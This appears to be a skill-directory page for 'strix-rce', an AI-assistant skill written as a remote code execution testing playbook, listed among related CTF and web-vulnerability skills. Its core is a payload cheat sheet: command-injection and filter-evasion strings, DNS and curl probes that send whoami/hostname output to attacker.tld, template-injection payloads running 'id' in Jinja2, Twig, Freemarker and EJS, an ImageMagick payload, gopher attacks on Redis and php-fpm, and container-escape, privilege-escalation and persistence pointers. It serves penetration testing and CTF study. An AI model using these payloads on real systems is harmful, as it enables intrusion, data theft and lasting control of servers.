en un clic
strix
Strix RCE 测试手册,覆盖命令注入、反序列化、模板注入与代码求值;触发名:strix-rce
Installer avec Codex ou Claude Copiez ce prompt, collez-le dans Codex, Claude ou un autre assistant, puis laissez-le vérifier la page du skill et l'installer pour vous.
Menu
Strix RCE 测试手册,覆盖命令注入、反序列化、模板注入与代码求值;触发名:strix-rce
Installer avec Codex ou Claude Copiez ce prompt, collez-le dans Codex, Claude ou un autre assistant, puis laissez-le vérifier la page du skill et l'installer pour vous.
Basé sur la classification professionnelle SOC
面向中文用户和新手的统一入口,保持原有两种模式:1) 自动分流,2) 先头脑风暴再分流。分流目标既可以是 ctf-*,也可以在 Web/接口/漏洞验证阶段增强到 strix-*;适合不知道该用哪个 skill、想先理清题意、又不想自己先判断何时该切到工具链或漏洞专项的场景;触发名:ctf-beginner-hub
面向 CTF 新手与综合题的统一总控 skill。保持原有两种主模式:1) 自动分流,2) 先头脑风暴再分流。分流目标既可以是 ctf-*,也可以在 Web/接口/漏洞验证阶段增强到 strix-*;适合不知道该用哪个 skill、想边做边学、又不想自己先判断何时切换到工具链或漏洞专项的场景;触发名:ctf-super-hub
Strix JWT 与 OIDC 安全测试手册,覆盖令牌伪造、算法混淆与声明篡改;触发名:strix-authentication-jwt
给中文用户和新手用的 Strix Lite 统一入口:先判断该用哪一个 strix-* 工具或漏洞测试 skill,再给最小化起手步骤;适合在 Web 安全测试、工具链使用、漏洞验证时不知道先用哪个 Strix skill 的场景;触发名:strix-beginner-hub
Strix 功能级授权缺陷测试手册,覆盖操作级权限失效、管理功能越权与 API 操作绕过;触发名:strix-broken-function-level-authorization
Strix 业务逻辑漏洞测试手册,覆盖流程绕过、状态操控与领域约束破坏;触发名:strix-business-logic
| name | Strix•远程代码执行 |
| description | Strix RCE 测试手册,覆盖命令注入、反序列化、模板注入与代码求值;触发名:strix-rce |
Remote code execution leads to full server control when input reaches code execution primitives: OS command wrappers, dynamic evaluators, template engines, deserializers, media pipelines, and build/runtime tooling. Focus on quiet, portable oracles and chain to stable shells only when needed.
Command Execution
Dynamic Evaluation
Deserialization
Media Pipelines
SSRF Chains
Container Escalation
Unix
;sleep 1, `sleep 1`, || sleep 1Windows
& timeout /t 2 &, ping -n 2 127.0.0.1Start-Sleep -s 2DNS
nslookup $(whoami).x.attacker.tld
HTTP
curl https://attacker.tld/$(hostname)
Direct
;id;uname -a;whoami
Encoded
;(id;hostname)|base64
Delimiters and Operators
; | || & && cmd $(cmd) $() ${IFS} newline/tab& | || ^Argument Injection
--output=/tmp/x, --config=)$PATH, ${HOME}, command substitution%TEMP%, !VAR!, PowerShell $(...)Path and Builtin Confusion
/usr/bin/id) vs relying on PATHprintf, getent) when id is filteredsh -c or cmd /c wrappers to reach the shellEvasion
${IFS}, $'\t', <w'h'o'a'm'i, w"h"o"a"m"ia=i;b=d; $a$becho payload | base64 -d | shIEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(...)))Identify server-side template engines: Jinja2/Twig/Blade/Freemarker/Velocity/Thymeleaf/EJS/Handlebars/Pug
Minimal Probes
Jinja2: {{7*7}} → {{cycler.__init__.__globals__['os'].popen('id').read()}}
Twig: {{7*7}} → {{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}
Freemarker: ${7*7} → <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id") }
EJS: <%= global.process.mainModule.require('child_process').execSync('id') %>
Java
.NET
PHP
unserialize() and PHAR metadataPython/Ruby
yaml.load/unsafe_load, MarshalExpression Languages
ImageMagick/GraphicsMagick
push graphic-context
fill 'url(https://x.tld/a"|id>/tmp/o")'
pop graphic-context
Ghostscript
%pipe%id file operatorsExifTool
LaTeX
\write18/--shell-escape, \input piping; pandoc filtersffmpeg
FastCGI
gopher:// to php-fpm (build FPM records to invoke system/exec)Redis
gopher:// write cron/authorized_keys or webrootAdmin Interfaces
Docker
/.dockerenv, /proc/1/cgroupcapsh --print/proc/sys/kernel/core_pattern or mount host with --privilegedKubernetes
/var/run/secrets/kubernetes.io/serviceaccountEncoding Differentials
Binary Alternatives
Privilege Escalation
sudo -l; SUID binaries; capabilities (getcap -r / 2>/dev/null)Persistence
Lateral Movement
RCE is a property of the execution boundary. Find the sink, establish a quiet oracle, and escalate to durable control only as far as necessary. Validate across transports and environments; defenses often differ per code path.